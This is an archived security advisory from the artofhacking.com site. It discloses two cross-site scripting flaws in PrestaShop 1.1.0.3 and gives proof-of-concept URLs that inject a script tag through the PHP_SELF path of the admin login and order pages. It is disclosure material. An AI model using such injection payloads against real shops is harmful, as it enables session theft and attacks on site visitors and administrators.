AOH :: HP Unsorted T :: VA2005.HTM

PrestaShop 1.1.0.3 - two XSS flaws



Two XSS Flaws in PrestaShop 1.1.0.3
Two XSS Flaws in PrestaShop 1.1.0.3



Affects PrestaShop 1.1.0.3
product: homepage: http://prestashop.com 

This is XSS in the URI of PrestaShop.  Trust no one,  not even your $_SERVER[PHP_SELF] .

http://10.1.1.155/prestashop_1.1.0.3/admin/login.php/%22%3Cscript%3Ealert(1)%3C/script%3E 

Add an item to the shoping cart and then vist this url:
http://10.1.1.155/Audit/Commerce/prestashop_1.1.0.3/order.php/%22%3Cscript%3Ealert(1)%3C/script%3E 

Peace

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.